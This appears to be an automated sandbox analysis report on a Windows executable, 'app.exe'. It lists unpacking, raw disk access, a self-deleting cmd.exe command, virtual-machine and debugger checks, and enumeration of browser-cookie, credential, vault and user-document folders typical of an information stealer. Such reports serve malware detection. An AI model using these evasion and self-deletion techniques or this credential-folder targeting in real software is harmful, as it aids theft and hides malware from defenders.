Data Obfuscation

Source: C:\Users\user\Desktop\app.exe Unpacked PE file: 0.2.app.exe.2560000.2.unpack
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Unpacked PE file: 3.2.app.exe.2530000.2.unpack
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_0042C59F VirtualAlloc,VirtualAlloc,LoadLibraryA,GetProcAddress,
Source: app.exe Static PE information: section name: )m&
Source: app.exe.0.dr Static PE information: section name: )m&
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00416398 push eax; ret
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00415460 push eax; ret
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_0047EC7F push FFFFFFA1h; retf
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00416F33 push ecx; ret
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025F23AD push es; iretd
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025EC6A1 push ecx; ret
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025F3881 push eax; ret
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025F691F push eax; ret
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_3_0552C6D7 push cs; iretd
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_3_055288A8 pushad ; iretd
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_3_05E6B3EB push ss; retf
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025C23AD push es; iretd
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025BC6A1 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025C3881 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025C691F push eax; ret

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\app.exe Code function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle,CloseHandle,GetSystemDirectoryA,CopyFileA,CreateFileA,DeviceIoControl,CloseHandle,GetCurrentProcess,SetPriorityClass,GetCurrentDirectoryA,CreateFileA,FindResourceA,LoadResource,LockResource,SizeofResource,WriteFile,FreeResource,CloseHandle,CloseHandle,CreateFileA,DeleteFileA,DeviceIoControl,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\app.exe Code function: CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe

Boot Survival

Source: C:\Users\user\Desktop\app.exe Code function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle,CloseHandle,GetSystemDirectoryA,CopyFileA,CreateFileA,DeviceIoControl,CloseHandle,GetCurrentProcess,SetPriorityClass,GetCurrentDirectoryA,CreateFileA,FindResourceA,LoadResource,LockResource,SizeofResource,WriteFile,FreeResource,CloseHandle,CloseHandle,CreateFileA,DeleteFileA,DeviceIoControl,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\app.exe Code function: CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Process created: cmd.exe /c timeout /t 5 & del /f /q C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe && exit
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00401660 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_0040CFF1 IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Users\user\Desktop\app.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
Source: C:\Users\user\Desktop\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
Source: C:\Users\user\Desktop\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
Source: C:\Users\user\Desktop\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
Source: C:\Users\user\Desktop\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Users\user\Desktop\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00408FF2 rdtsc
Source: C:\Users\user\Desktop\app.exe Code function: LoadLibraryA,FreeLibrary,GetAdaptersInfo,GetAdaptersInfo,
Source: C:\Users\user\Desktop\app.exe API coverage: 2.6 %
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe API coverage: 8.1 %
Source: C:\Users\user\Desktop\app.exe TID: 1440 Thread sleep count: 53 > 30
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe TID: 6904 Thread sleep count: 68 > 30
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe TID: 1588 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 1928 Thread sleep count: 39 > 30
Source: C:\Users\user\Desktop\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Users\user\Desktop\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00427361 GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025CA710 CloseHandle,FindFirstFileW,FindClose,HeapFree,HeapFree,HeapFree,
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025E4B93 FindFirstFileExW,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_0259A710 CloseHandle,FindFirstFileW,FindClose,HeapFree,HeapFree,HeapFree,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_0259FEC0 HeapFree,HeapFree,HeapFree,HeapFree,FindFirstFileW,HeapFree,HeapFree,GetLastError,HeapFree,HeapFree,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025B4B93 FindFirstFileExW,
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_0041E91D VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,
Source: app.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107954475.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3092789933.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3098259663.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3099980672.0000000000956000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: app.exe, 00000003.00000002.3294569055.00000000008CF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025E44E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_0042C59F VirtualAlloc,VirtualAlloc,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025CD430 GetProcessHeap,RtlAllocateHeap,
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_0041B198 SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_0041B1AC SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_0256EAC0 RtlAddVectoredExceptionHandler,SetThreadStackGuarantee,GetLastError,HeapFree,HeapFree,
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025DE0C8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_0253EAC0 RtlAddVectoredExceptionHandler,SetThreadStackGuarantee,GetLastError,HeapFree,HeapFree,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025AE0C8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025B44E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025ADC6E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025ADDCA SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\app.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\app.exe Process created: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe "C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00409127 cpuid
Source: C:\Users\user\Desktop\app.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP,
Source: C:\Users\user\Desktop\app.exe Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\app.exe Code function: lstrcpyA,wsprintfA,LoadLibraryA,GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\.curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\3D Objects VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\3D Objects\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\.curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Adobe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Comms VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\D3DSCache VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\ElevatedDiagnostics VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Google VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\History VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\IconCache.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Intel VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\MicrosoftEdge VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Mozilla VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\PeerDistRepub VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Publishers VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\VirtualStore VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\_curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\LocalLow VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\LocalLow\Adobe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\LocalLow\Intel VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\LocalLow\Microsoft VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\LocalLow\Mozilla VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\.curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Sun VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\_curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe\Acrobat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe\Flash Player VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe\Headlights VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe\Linguistics VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe\LogTransport2 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\AddIns VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Credentials VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Excel VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\MMC VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Network VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Protect VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Vault VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\SystemExtensionsDev VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Sun\Java VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Contacts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Contacts\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\container.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\deprecated.cookie VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\container.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\Low VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\ESE VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\ESE\container.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Low VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Low\ESE VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\AFWAAFRXKO VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\app.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\FACWLRWHGG.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\GQSZOBXUFX\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\GQSZOBXUFX\JPEAFKFPZY.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\GQSZOBXUFX\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\GQSZOBXUFX\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\GQSZOBXUFX\YCGNAHEPCK.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\IVHSHTCODI VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\IVHSHTCODI.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\JDSOXXXWOA VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\JPEAFKFPZY.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\MLMJAYLPER VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\MLMJAYLPER\FACWLRWHGG.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\MLMJAYLPER\IVHSHTCODI.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\MLMJAYLPER\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\PSAMNLJHZW VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\UQMPCTZARJ.pdf VolumeInformation
